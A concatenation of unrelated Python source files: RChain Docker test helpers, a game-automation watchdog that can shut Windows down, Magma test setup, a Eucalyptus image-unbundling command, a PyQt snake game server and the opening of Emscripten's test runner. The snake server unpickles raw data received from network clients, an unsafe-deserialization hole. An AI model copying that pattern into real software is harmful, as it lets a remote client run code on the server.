__timestamp_rx = "\\d\\d:\\d\\d:\\d\\d\\.\\d\\d\\d"
__log_message_rx = re.compile("^{timestamp_rx} (.*?)(?={timestamp_rx})".format(timestamp_rx=__timestamp_rx), re.MULTILINE | re.DOTALL)
def log_lines(self) -> List[str]:
log_content = self.logs()
return Node.__log_message_rx.split(log_content)
def deploy_contract_with_substitution(self, substitute_dict: Dict[str, str], rho_file_path: str, private_key: PrivateKey, phlo_limit:int = DEFAULT_PHLO_LIMIT, phlo_price: int = DEFAULT_PHLO_PRICE) -> str:
"""
Supposed that you have a contract with content like below.
new x in { x!("#DATA") }
If you pass a dict {'#DATA': "123456"} as substitute_dict args in this func,
this method would substitute the string #DATA in the contract with 123456, which turns out to be
new x in { x!("123456") }
And then deploy the contract in the node
"""
shutil.copyfile(rho_file_path, os.path.join(self.local_deploy_dir, os.path.basename(rho_file_path)))
container_contract_file_path = os.path.join(self.remote_deploy_dir, os.path.basename(rho_file_path))
substitute_rules = ';'.join([r's/{}/{}/g'.format(key.replace(r'/', r'\/'), value.replace(r'/', r'\/')) for key, value in substitute_dict.items()])
self.shell_out(
'sed',
'-i',
'-e', substitute_rules,
container_contract_file_path,
)
self.deploy(container_contract_file_path, private_key, phlo_limit, phlo_price)
block_hash = self.propose()
return block_hash
class LoggingThread(threading.Thread):
def __init__(self, terminate_thread_event: Event, container: Container, logger: Logger) -> None:
super().__init__()
self.terminate_thread_event = terminate_thread_event
self.container = container
self.logger = logger
def run(self) -> None:
containers_log_lines_generator = self.container.logs(stream=True, follow=True)
try:
while True:
if self.terminate_thread_event.is_set():
break
line = next(containers_log_lines_generator)
self.logger.info('{}: {}'.format(self.container.name, line.decode('utf-8').rstrip()))
except StopIteration:
pass
class DeployThread(threading.Thread):
def __init__(self, name: str, node: Node, contract: str, count: int, private_key: PrivateKey) -> None:
threading.Thread.__init__(self)
self.name = name
self.node = node
self.contract = contract
self.count = count
self.private_key = private_key
def run(self) -> None:
for _ in range(self.count):
self.node.deploy(self.contract, self.private_key)
self.node.propose()
def make_container_command(container_command: str, container_command_flags: AbstractSet, container_command_options: Dict) -> str:
opts = ['{} {}'.format(option, argument) for option, argument in container_command_options.items()]
flags = ' '.join(container_command_flags)
result = '{} {} {}'.format(container_command, flags, ' '.join(opts))
return result
def make_node(
*,
docker_client: DockerClient,
name: str,
network: str,
bonds_file: str,
container_command: str,
container_command_flags: AbstractSet,
container_command_options: Dict,
command_timeout: int,
extra_volumes: Optional[List[str]],
allowed_peers: Optional[List[str]],
image: str = DEFAULT_IMAGE,
mem_limit: Optional[str] = None,
wallets_file: Optional[str] = None,
) -> Node:
assert isinstance(name, str)
assert '_' not in name, 'Underscore is not allowed in host name'
deploy_dir = make_tempdir("rchain-integration-test")
hosts_allow_file_content = \
"ALL:ALL" if allowed_peers is None else "\n".join("ALL: {}".format(peer) for peer in allowed_peers)
hosts_allow_file = make_tempfile("hosts-allow-{}".format(name), hosts_allow_file_content)
hosts_deny_file = make_tempfile("hosts-deny-{}".format(name), "ALL: ALL")
command = make_container_command(container_command, container_command_flags, container_command_options)
env = {}
java_options = os.environ.get('_JAVA_OPTIONS')
if java_options is not None:
env['_JAVA_OPTIONS'] = java_options
logging.debug('Using _JAVA_OPTIONS: {}'.format(java_options))
volumes = [
"{}:/etc/hosts.allow".format(hosts_allow_file),
"{}:/etc/hosts.deny".format(hosts_deny_file),
"{}:{}".format(bonds_file, rnode_bonds_file),
"{}:{}".format(deploy_dir, rnode_deploy_dir),
]
if wallets_file is not None:
volumes.append('{}:{}'.format(wallets_file, rnode_wallets_file))
if extra_volumes:
all_volumes = volumes + extra_volumes
else:
all_volumes = volumes
logging.info('STARTING %s %s', name, command)
container = docker_client.containers.run(
image,
name=name,
user='root',
detach=True,
mem_limit=mem_limit,
network=network,
volumes=all_volumes,
command=command,
hostname=name,
environment=env,
)
node = Node(
container=container,
deploy_dir=deploy_dir,
command_timeout=command_timeout,
network=network,
)
return node
def make_bootstrap_node(
*,
docker_client: DockerClient,
network: str,
bonds_file: str,
private_key: PrivateKey,
command_timeout: int,
allowed_peers: Optional[List[str]] = None,
mem_limit: Optional[str] = None,
cli_flags: Optional[AbstractSet] = None,
cli_options: Optional[Dict] = None,
wallets_file: Optional[str] = None,
extra_volumes: Optional[List[str]] = None,
synchrony_constraint_threshold: float = 0.0,
max_peer_queue_size: int = 10,
give_up_after_skipped: int = 0,
drop_peer_after_retries: int = 0,
number_of_active_validators: int = 10,
epoch_length: int = 10000,
quarantine_length: int = 50000
) -> Node:
container_name = make_bootstrap_name(network)
container_command_flags = set([
*rnode_default_launcher_args,
"--standalone",
"--prometheus",
"--no-upnp",
"--allow-private-addresses"
])
container_command_options = {
"--port": 40400,
"--validator-private-key": private_key.to_hex(),
"--validator-public-key": private_key.get_public_key().to_hex(),
"--host": container_name,
"--synchrony-constraint-threshold": synchrony_constraint_threshold,
"--max-peer-queue-size": max_peer_queue_size,
"--give-up-after-skipped": give_up_after_skipped,
"--drop-peer-after-retries": drop_peer_after_retries,
"--number-of-active-validators": number_of_active_validators,
"--epoch-length": epoch_length,
"--quarantine-length": quarantine_length
}
if cli_flags is not None:
container_command_flags.update(cli_flags)
if cli_options is not None:
container_command_options.update(cli_options)
container = make_node(
docker_client=docker_client,
name=container_name,
network=network,
bonds_file=bonds_file,
container_command='run',
container_command_flags=container_command_flags,
container_command_options=container_command_options,
command_timeout=command_timeout,
extra_volumes=extra_volumes,
allowed_peers=allowed_peers,
mem_limit=mem_limit if mem_limit is not None else '4G',
wallets_file=wallets_file,
)
return container
def make_container_name(network_name: str, name: str) -> str:
return "{network_name}.{name}".format(network_name=network_name, name=name)
def make_bootstrap_name(network_name: str) -> str:
return make_container_name(network_name=network_name, name='bootstrap')
def make_peer_name(network_name: str, name: str) -> str:
if name.isdigit():
actual_name = 'peer{}'.format(name)
else:
actual_name = name
return make_container_name(network_name=network_name, name=actual_name)
def make_peer(
*,
docker_client: DockerClient,
network: str,
name: str,
bonds_file: str,
command_timeout: int,
bootstrap: Node,
private_key: PrivateKey,
allowed_peers: Optional[List[str]] = None,
mem_limit: Optional[str] = None,
wallets_file: Optional[str] = None,
cli_flags: Optional[AbstractSet] = None,
cli_options: Optional[Dict] = None,
extra_volumes: Optional[List[str]] = None,
synchrony_constraint_threshold: float = 0.0,
max_peer_queue_size: int = 10,
give_up_after_skipped: int = 0,
drop_peer_after_retries: int = 0,
number_of_active_validators: int = 10,
epoch_length: int = 10000,
quarantine_length: int = 50000
) -> Node:
assert isinstance(name, str)
assert '_' not in name, 'Underscore is not allowed in host name'
name = make_peer_name(network, name)
bootstrap_address = bootstrap.get_rnode_address()
container_command_flags = set([
"--prometheus",
"--no-upnp",
"--allow-private-addresses"
])
if cli_flags is not None:
container_command_flags.update(cli_flags)
container_command_options = {
"--bootstrap": bootstrap_address,
"--validator-private-key": private_key.to_hex(),
"--validator-public-key": private_key.get_public_key().to_hex(),
"--host": name,
"--synchrony-constraint-threshold": synchrony_constraint_threshold,
"--max-peer-queue-size": max_peer_queue_size,
"--give-up-after-skipped": give_up_after_skipped,
"--drop-peer-after-retries": drop_peer_after_retries,
"--number-of-active-validators": number_of_active_validators,
"--epoch-length": epoch_length,
"--quarantine-length": quarantine_length
}
if cli_options is not None:
container_command_options.update(cli_options)
container = make_node(
docker_client=docker_client,
name=name,
network=network,
bonds_file=bonds_file,
container_command='run',
container_command_flags=container_command_flags,
container_command_options=container_command_options,
command_timeout=command_timeout,
extra_volumes=extra_volumes,
allowed_peers=allowed_peers,
mem_limit=mem_limit if not None else '4G',
wallets_file=wallets_file,
)
return container
@contextlib.contextmanager
def started_peer(
*,
context: TestingContext,
network: str,
name: str,
bootstrap: Node,
private_key: PrivateKey,
cli_flags: Optional[AbstractSet] = None,
cli_options: Optional[Dict] = None,
extra_volumes: Optional[List[str]] = None,
synchrony_constraint_threshold: float = 0.0,
epoch_length: int = 10000,
quarantine_length: int = 50000
) -> Generator[Node, None, None]:
peer = make_peer(
docker_client=context.docker,
network=network,
name=name,
bonds_file=context.bonds_file,
bootstrap=bootstrap,
private_key=private_key,
command_timeout=context.command_timeout,
wallets_file=context.wallets_file,
cli_flags=cli_flags,
cli_options=cli_options,
extra_volumes=extra_volumes,
synchrony_constraint_threshold=synchrony_constraint_threshold,
epoch_length=epoch_length,
quarantine_length=quarantine_length
)
try:
wait_for_node_started(context, peer)
yield peer
finally:
peer.cleanup()
@contextlib.contextmanager
def bootstrap_connected_peer(
*,
context: TestingContext,
bootstrap: Node,
name: str,
private_key: PrivateKey,
cli_options: Optional[Dict[str, str]] = None,
synchrony_constraint_threshold: float = 0.0,
epoch_length: int = 10000,
quarantine_length: int = 50000
) -> Generator[Node, None, None]:
with started_peer(
context=context,
network=bootstrap.network,
name=name,
bootstrap=bootstrap,
private_key=private_key,
cli_options=cli_options,
synchrony_constraint_threshold=synchrony_constraint_threshold,
epoch_length=epoch_length,
quarantine_length=quarantine_length
) as peer:
wait_for_approved_block_received_handler_state(context, peer)
yield peer
def make_random_network_name(context: TestingContext, length: int) -> str:
return ''.join(context.random_generator.choice(string.ascii_lowercase) for m in range(length))
@contextlib.contextmanager
def docker_network(context: TestingContext, docker_client: DockerClient) -> Generator[str, None, None]:
network_name = "rchain-{}".format(make_random_network_name(context, 5))
docker_client.networks.create(network_name, driver="bridge")
try:
yield network_name
finally:
for network in docker_client.networks.list():
if network_name == network.name:
network.remove()
@contextlib.contextmanager
def started_bootstrap(
*,
context: TestingContext,
network: str,
cli_flags: Optional[AbstractSet] = None,
cli_options: Optional[Dict[str, str]] = None,
extra_volumes: Optional[List[str]] = None,
synchrony_constraint_threshold: float = 0.0,
epoch_length: int = 10000,
quarantine_length: int = 50000
) -> Generator[Node, None, None]:
bootstrap_node = make_bootstrap_node(
docker_client=context.docker,
network=network,
bonds_file=context.bonds_file,
private_key=context.bootstrap_key,
command_timeout=context.command_timeout,
cli_flags=cli_flags,
cli_options=cli_options,
wallets_file=context.wallets_file,
extra_volumes=extra_volumes,
synchrony_constraint_threshold=synchrony_constraint_threshold,
epoch_length=epoch_length,
quarantine_length=quarantine_length
)
try:
wait_for_node_started(context, bootstrap_node)
yield bootstrap_node
finally:
bootstrap_node.cleanup()
@contextlib.contextmanager
def started_bootstrap_with_network(
context: TestingContext,
cli_flags: Optional[AbstractSet] = None,
cli_options: Optional[Dict] = None,
synchrony_constraint_threshold: float = 0.0,
epoch_length: int = 10000,
quarantine_length: int = 50000,
extra_volumes: Optional[List[str]] = None,
wait_for_approved_block: bool = False,
) -> Generator[Node, None, None]:
with docker_network(context, context.docker) as network:
with started_bootstrap(
context=context,
network=network,
cli_flags=cli_flags,
cli_options=cli_options,
synchrony_constraint_threshold=synchrony_constraint_threshold,
extra_volumes=extra_volumes,
epoch_length=epoch_length,
quarantine_length=quarantine_length
) as bootstrap:
if wait_for_approved_block:
wait_for_approved_block_received_handler_state(context, bootstrap)
yield bootstrap
ready_bootstrap_with_network = functools.partial(started_bootstrap_with_network,
wait_for_approved_block=True)
|
money.py
|
import os
import time
from datetime import datetime
from multiprocessing import Process, Value
import sys
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
from constant import MAX_TIME
# 日志输出
from logger import logger as logging
from util import check_game_state, start_game, initDevice
waitTime = Value('i', 0)
def startGame(waitTime1):
initDevice()
global waitTime
waitTime = waitTime1
start_game()
check_game_state(waitTime)
def updateTime(event):
if "screen.png" in event.src_path:
global lastChangeTime
lastChangeTime = datetime.now()
logging.debug('{0}:{1}'.format(event.event_type, event.src_path))
class MyHandler(FileSystemEventHandler):
def __init__(self):
FileSystemEventHandler.__init__(self)
def on_created(self, event):
updateTime(event)
lastChangeTime = datetime.now()
if __name__ == '__main__':
closeTime = -1
args = sys.argv[1:]
if len(args) > 0:
closeTime = args[0]
print("父进程:{0}".format(os.getpid()))
p = Process(target=startGame, args=(waitTime,))
p.start()
print("子进程:启动成功")
event_handler = MyHandler()
observer = Observer()
observer.schedule(event_handler, path='.', recursive=False)
observer.start()
restartCount = 0
try:
while True:
if waitTime.value < 0:
p.terminate()
observer.stop()
break
elif waitTime.value == 0 and (datetime.now() - lastChangeTime).seconds > MAX_TIME:
p.terminate()
p = Process(target=startGame, args=(waitTime,))
logging.warning('进程重启.')
restartCount += 1
if restartCount == 5:
p.terminate()
observer.stop()
break
p.start()
lastChangeTime = datetime.now()
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
logging.error('Process end.')
if closeTime >= 0:
# windows系统关机
os.system("shutdown -s -t {0}".format(closeTime))
|
start_pipelined.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import subprocess
import threading
from collections import namedtuple
from concurrent.futures import Future
from enum import Enum
from magma.pipelined.app.base import MagmaController
from magma.pipelined.internal_ip_allocator import InternalIPAllocator
from magma.pipelined.tests.app.exceptions import ServiceRunningError
from ryu.base.app_manager import AppManager
from ryu.lib import hub
class TestSetup(object):
"""
The TestSetup class variables
apps: [Controller]: ryu apps to instantiate
references: [Controller]: futures to get references of
instantiated apps
config: dict: config for ryu app
mconfig: dict: mconfig for ryu app
service_manager: ServiceManager: service manager for ryu app
integ_test: bool: set true when running tests in
integ setting
"""
def __init__(
self, apps, references, config, mconfig, loop,
service_manager, integ_test=False, rpc_stubs=None,
):
self.apps = apps
self.references = references
self.config = config
self.mconfig = mconfig
self.service_manager = service_manager
self.loop = loop
self.integ_test = integ_test
if rpc_stubs is None:
rpc_stubs = {}
self.rpc_stubs = rpc_stubs
Controller = namedtuple('Controller', ['name', 'app_future'])
class PipelinedController(Enum):
InOut = Controller(
'magma.pipelined.app.inout', 'inout',
)
Arp = Controller(
'magma.pipelined.app.arp', 'arpd',
)
IPV6RouterSolicitation = Controller(
'magma.pipelined.app.ipv6_solicitation',
'ipv6_solicitation',
)
GY = Controller(
'magma.pipelined.app.gy', 'gy',
)
Enforcement = Controller(
'magma.pipelined.app.enforcement', 'enforcement',
)
Enforcement_stats = Controller(
'magma.pipelined.app.enforcement_stats', 'enforcement_stats',
)
Testing = Controller(
'magma.pipelined.app.testing', 'testing',
)
AccessControl = Controller(
'magma.pipelined.app.access_control', 'access_control',
)
UEMac = Controller(
'magma.pipelined.app.ue_mac', 'ue_mac',
)
TunnelLearnController = Controller(
'magma.pipelined.app.tunnel_learn', 'tunnel_learn',
)
VlanLearn = Controller(
'magma.pipelined.app.vlan_learn', 'vlan_learn',
)
CheckQuotaController = Controller(
'magma.pipelined.app.check_quota', 'check_quota',
)
IPFIX = Controller(
'magma.pipelined.app.ipfix', 'ipfix',
)
LIMirror = Controller(
'magma.pipelined.app.li_mirror', 'li_mirror',
)
PacketTracer = Controller(
'magma.pipelined.app.packet_tracer', 'packet_tracer',
)
StartupFlows = Controller(
'magma.pipelined.app.startup_flows', 'startup_flows',
)
DPI = Controller(
'magma.pipelined.app.dpi', 'dpi',
)
UplinkBridge = Controller(
'magma.pipelined.app.uplink_bridge', 'uplink_bridge',
)
Conntrack = Controller(
'magma.pipelined.app.conntrack', 'conntrack',
)
Classifier = Controller(
'magma.pipelined.app.classifier', 'classifier',
)
HeaderEnrichment = Controller(
'magma.pipelined.app.he', 'proxy',
)
NGServiceController = Controller(
'magma.pipelined.app.ng_services', 'ng_services',
)
def assert_pipelined_not_running():
"""
As Ryu applications shoudn't be started if the magma@pipelined service is
running we need to verify if pipelined is active. If service is running
throws a ServiceRunningError exception.
This can be done using the command:
systemctl is-active magma@pipelined
If service is pipelined, this returns an error code 3 & message "inactive"
"""
try:
output = subprocess.check_output(
["systemctl", "is-active", "magma@pipelined"],
)
except subprocess.CalledProcessError as e:
if "inactive" not in str(e.output, 'utf-8'):
raise ServiceRunningError(
"Pipelined is running, 'systemctl is-active magma@pipelined'" +
"caused an error code %d, exception - %s"
% (e.returncode, str(e.output, 'utf-8').strip()),
)
else:
raise ServiceRunningError(
"Pipelined is running, 'systemctl is-active magma@pipelined'" +
"output - %s" % str(output, 'utf-8').strip(),
)
class StartThread(object):
"""
Starts ryu applications
Uses ryu hub and ryu app_manager to launch ryu applications. By using
futures get references to the instantiated apps. This allows unittests to
call methods from pipelined apps.
"""
_Event = namedtuple('_Event', ['func', 'future'])
def __init__(self, test_setup, launch_successful_future):
""" If verification fails throw an exception, don't start ryu apps """
if test_setup.integ_test is False:
hub.patch(thread=True)
assert_pipelined_not_running()
self._test_setup = test_setup
self.keep_running = True
self.done = False
self.event_queue = hub.Queue()
thread = threading.Thread(
target=self.start_ryu_apps, args=(launch_successful_future,),
)
thread.daemon = True
thread.start()
def start_ryu_apps(self, launch_successful_future):
"""
Starts up ryu applications, all the configuration is parsed from the
test_setup config provided in the unit test.
If apps throw an exception on launch, error is passed in the
launch_successful_future and will prevent infinitely waiting.
"""
self.reset_static_vars()
hub.spawn(self._process_queue)
app_lists = [a.value.name for a in self._test_setup.apps]
app_futures = {
controller.value.app_future: future
for (controller, future) in self._test_setup.references.items()
}
manager = AppManager.get_instance()
manager.load_apps(app_lists)
contexts = manager.create_contexts()
contexts['sids_by_ip'] = {} # shared by both metering apps
contexts['rule_id_mapper'] = \
self._test_setup.service_manager.rule_id_mapper
contexts['internal_ip_allocator'] = \
InternalIPAllocator(self._test_setup.config)
contexts['session_rule_version_mapper'] = \
self._test_setup.service_manager.session_rule_version_mapper
contexts['interface_to_prefix_mapper'] = \
self._test_setup.service_manager.interface_to_prefix_mapper
contexts['restart_info_store'] = \
self._test_setup.service_manager.restart_info_store
contexts['app_futures'] = app_futures
contexts['config'] = self._test_setup.config
contexts['mconfig'] = self._test_setup.mconfig
contexts['loop'] = self._test_setup.loop
contexts['rpc_stubs'] = self._test_setup.rpc_stubs
contexts['service_manager'] = self._test_setup.service_manager
contexts['ebpf_manager'] = None
logging.basicConfig(
level=logging.INFO,
format='[%(asctime)s %(levelname)s %(name)s] %(message)s',
)
services = []
try:
services.extend(manager.instantiate_apps(**contexts))
except Exception as e:
launch_successful_future.set_result(
"Ryu apps launch exception: {}".format(e),
)
raise
launch_successful_future.set_result("Setup successful")
self.run(manager)
def _process_queue(self):
"""
Run a queue to process external events that need to be run in the Ryu
greenthread
"""
while self.keep_running:
try:
event = self.event_queue.get(block=False)
val = event.func()
event.future.set_result(val)
except hub.QueueEmpty:
pass
finally:
hub.sleep(0.1)
def run_in_greenthread(self, func):
"""
When not monkey patching (i.e. when running a gRPC server), you cannot
call directly into a Ryu app. To do this, there needs to be a boundary
between futures and hub.Queues. When this function is called, a lambda
is passed which is sent into a queue to be run by the Ryu greenthread.
"""
ev = self._Event(func=func, future=Future())
self.event_queue.put(ev)
return ev.future.result()
def run(self, manager):
""" Keep running until signalled from test file """
while self.keep_running:
hub.sleep(1)
manager.close()
self.done = True
def reset_static_vars(self):
""" Reset static vars for running nosetests """
AppManager._instance = AppManager()
MagmaController.TABLES = {}
|
downloadandunbundle.py
|
# Copyright 2009-2014 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import multiprocessing
import os.path
import sys
from requestbuilder import Arg
from requestbuilder.exceptions import ArgumentError
from requestbuilder.mixins import FileTransferProgressBarMixin
from euca2ools.bundle.util import open_pipe_fileobjs
from euca2ools.bundle.util import waitpid_in_thread
from euca2ools.commands.bundle.downloadbundle import DownloadBundle
from euca2ools.commands.bundle.mixins import BundleDownloadingMixin
from euca2ools.commands.bundle.unbundlestream import UnbundleStream
from euca2ools.commands.s3 import S3Request
class DownloadAndUnbundle(S3Request, FileTransferProgressBarMixin,
BundleDownloadingMixin):
DESCRIPTION = ('Download and unbundle a bundled image from the cloud\n\n '
'The key used to unbundle the image must match a '
'certificate that was used to bundle it.')
ARGS = [Arg('-d', '--destination', dest='dest', metavar='(FILE | DIR)',
default=".", help='''where to place the unbundled image
(default: current directory)'''),
Arg('-k', '--privatekey',
help='''file containing the private key to decrypt the bundle
with. This must match a certificate used when bundling the
image.''')]
# noinspection PyExceptionInherit
def configure(self):
S3Request.configure(self)
# The private key could be the user's or the cloud's. In the config
# this is a user-level option.
if not self.args.get('privatekey'):
config_privatekey = self.config.get_user_option('private-key')
if self.args.get('userregion'):
self.args['privatekey'] = config_privatekey
elif 'EC2_PRIVATE_KEY' in os.environ:
self.args['privatekey'] = os.getenv('EC2_PRIVATE_KEY')
elif config_privatekey:
self.args['privatekey'] = config_privatekey
else:
raise ArgumentError(
'missing private key; please supply one with -k')
self.args['privatekey'] = os.path.expanduser(os.path.expandvars(
self.args['privatekey']))
if not os.path.exists(self.args['privatekey']):
raise ArgumentError("private key file '{0}' does not exist"
.format(self.args['privatekey']))
if not os.path.isfile(self.args['privatekey']):
raise ArgumentError("private key file '{0}' is not a file"
.format(self.args['privatekey']))
self.log.debug('private key: %s', self.args['privatekey'])
def __open_dest(self, manifest):
if self.args['dest'] == '-':
self.args['dest'] = sys.stdout
self.args['show_progress'] = False
elif isinstance(self.args['dest'], basestring):
if os.path.isdir(self.args['dest']):
image_filename = os.path.join(self.args['dest'],
manifest.image_name)
else:
image_filename = self.args['dest']
self.args['dest'] = open(image_filename, 'w')
return image_filename
# Otherwise we assume it's a file object
def main(self):
manifest = self.fetch_manifest(
self.service, privkey_filename=self.args['privatekey'])
download_out_r, download_out_w = open_pipe_fileobjs()
try:
self.__create_download_pipeline(download_out_w)
finally:
download_out_w.close()
image_filename = self.__open_dest(manifest)
unbundlestream = UnbundleStream.from_other(
self, source=download_out_r, dest=self.args['dest'],
enc_key=manifest.enc_key, enc_iv=manifest.enc_iv,
image_size=manifest.image_size, sha1_digest=manifest.image_digest,
show_progress=self.args.get('show_progress', False))
unbundlestream.main()
return image_filename
def __create_download_pipeline(self, outfile):
downloadbundle = DownloadBundle.from_other(
self, dest=outfile, bucket=self.args['bucket'],
manifest=self.args.get('manifest'),
local_manifest=self.args.get('local_manifest'),
show_progress=False)
downloadbundle_p = multiprocessing.Process(target=downloadbundle.main)
downloadbundle_p.start()
waitpid_in_thread(downloadbundle_p.pid)
outfile.close()
def print_result(self, image_filename):
if (image_filename and
self.args['dest'].fileno() != sys.stdout.fileno()):
print 'Wrote', image_filename
|
SnakeServer.py
|
import socket
import pickle
import random
import threading
import sys
from PyQt5.QtWidgets import *
from PyQt5.QtCore import Qt
def get_ip():
try:
h_name = socket.gethostname()
IP = socket.gethostbyname(h_name)
except Exception:
IP = '127.0.0.1'
return IP
class SnakeServer:
def __init__(self):
self.running = True
def GameSession(self, Connections):
food_pos = []
data_snake_1 = []
data_snake_2 = []
no_food = True
while self.running:
data_snake_1 = Connections[0].recv(1024)
data_snake_2 = Connections[1].recv(1024)
if not data_snake_1:
break
if not data_snake_2:
break
data_snake_1 = pickle.loads(data_snake_1)
data_snake_2 = pickle.loads(data_snake_2)
if not food_pos:
no_food = True
else:
no_food = False
while not food_pos:
x = random.randint(2, 28) * 20
y = random.randint(2, 28) * 20
if not [x, y] in data_snake_1 and not [x, y] in data_snake_2:
food_pos = [x, y]
data_snake_1.append(food_pos)
data_snake_2.append(food_pos)
if data_snake_1[-2] == food_pos or data_snake_2[-2] == food_pos:
food_pos = []
data_snake_1.append([-20, -20])
data_snake_2.append([-20, -20])
if food_pos and no_food == False:
data_snake_1.append(food_pos)
data_snake_2.append(food_pos)
data_snake_1 = pickle.dumps(data_snake_1)
data_snake_2 = pickle.dumps(data_snake_2)
Connections[0].sendall(data_snake_2)
Connections[1].sendall(data_snake_1)
def Start(self):
self.running = True
HOST = get_ip()
PORT = 65432
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.bind((HOST, PORT))
self.s.listen(5)
conn_list = []
threads = []
print("Server is Running")
while self.running:
for i in range(2):
try:
if i:
print("Waiting for 2nd Player to connect")
conn, addr = self.s.accept()
print('Connected by', addr[0])
conn_list.append(conn)
except:
self.running = False
threads.append(threading.Thread(
target=self.GameSession, args=(conn_list,)))
threads[-1].start()
conn_list = []
def Stop(self):
self.s.close()
self.running = False
class ServerWindow(QMainWindow):
def __init__(self, *args, **kwargs):
super(ServerWindow, self).__init__(*args, **kwargs)
self.server_is_online = False
self.ss = SnakeServer()
# self.server = threading.Thread(target=self.ss.Start, args=())
self.setWindowTitle("Server")
self.setFixedWidth(300)
self.setFixedHeight(300)
self.server_status = QLabel(" Server Status: Offline", self)
self.server_status.setStyleSheet("background-color: red")
self.server_status.resize(150, 30)
self.server_status.move(0, 0)
ip_label = QLabel("Local IP:" + get_ip(),self)
ip_label.move(200,0)
start_btn = QPushButton("Start", self)
start_btn.setToolTip("Start your Server")
start_btn.resize(150, 100)
start_btn.move(0, 200)
start_btn.setStyleSheet("QPushButton"
"{"
"background-color : green;"
"}")
start_btn.clicked.connect(self.On_start)
stop_btn = QPushButton("Stop", self)
stop_btn.setToolTip("Stop your Server")
stop_btn.resize(150, 100)
stop_btn.move(150, 200)
stop_btn.setStyleSheet("QPushButton"
"{"
"background-color : red;"
"}")
stop_btn.clicked.connect(self.On_stop)
def PlayerList(self):
pass
def On_start(self):
if not self.server_is_online:
self.server_status.setStyleSheet("background-color: green")
self.server_status.setText(" Server Status: Online")
self.server = threading.Thread(target=self.ss.Start, args=())
self.server.start()
self.server_is_online = True
else:
print("Server is allready running")
def On_stop(self):
if self.server_is_online:
self.server_status.setStyleSheet("background-color: red")
self.server_status.setText(" Server Status: Offline")
print("Server is stopping...")
self.ss.Stop()
self.server.join()
print("Server Stopped")
self.server_is_online = False
else:
print("Server is allready stopped")
if __name__ == "__main__":
app = QApplication(sys.argv)
window = ServerWindow()
window.show()
app.exec_()
|
runner.py
|
#!/usr/bin/env python2
# Copyright 2010 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""This is the Emscripten test runner. To run some tests, specify which tests
you want, for example
python tests/runner.py asm1.test_hello_world
There are many options for which tests to run and how to run them. For details,
see
http://kripken.github.io/emscripten-site/docs/getting_started/test-suite.html
"""
# XXX Use EMTEST_ALL_ENGINES=1 in the env to test all engines!
from __future__ import print_function
from subprocess import PIPE, STDOUT
import argparse
import atexit
import contextlib
import difflib
import fnmatch
import glob
import hashlib
import json
import logging
import math
import multiprocessing
import operator
import os
import random
import re
import shlex
import shutil
import string
import subprocess
import sys
import tempfile
import time
import unittest
import urllib
import webbrowser
if sys.version_info.major == 2:
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from urllib import unquote
else:
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(__rootpath__)
import parallel_runner
from tools.shared import EM_CONFIG, TEMP_DIR, EMCC, DEBUG, PYTHON, LLVM_TARGET, ASM_JS_TARGET, EMSCRIPTEN_TEMP_DIR, WASM_TARGET, SPIDERMONKEY_ENGINE, WINDOWS, V8_ENGINE, NODE_JS, EM_BUILD_VERBOSE
from tools.shared import asstr, get_canonical_temp_dir, Building, run_process, try_delete, to_cc, asbytes, safe_copy, Settings
from tools import jsrun, shared, line_endings
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger(__file__)
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
EMTEST_WASM_PTHREADS = int(os.getenv('EMTEST_WASM_PTHREADS', '1'))
# Also suppot the old name: EM_SAVE_DIR
EMTEST_SAVE_DIR = os.getenv('EMTEST_SAVE_DIR', os.getenv('EM_SAVE_DIR'))
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0'))
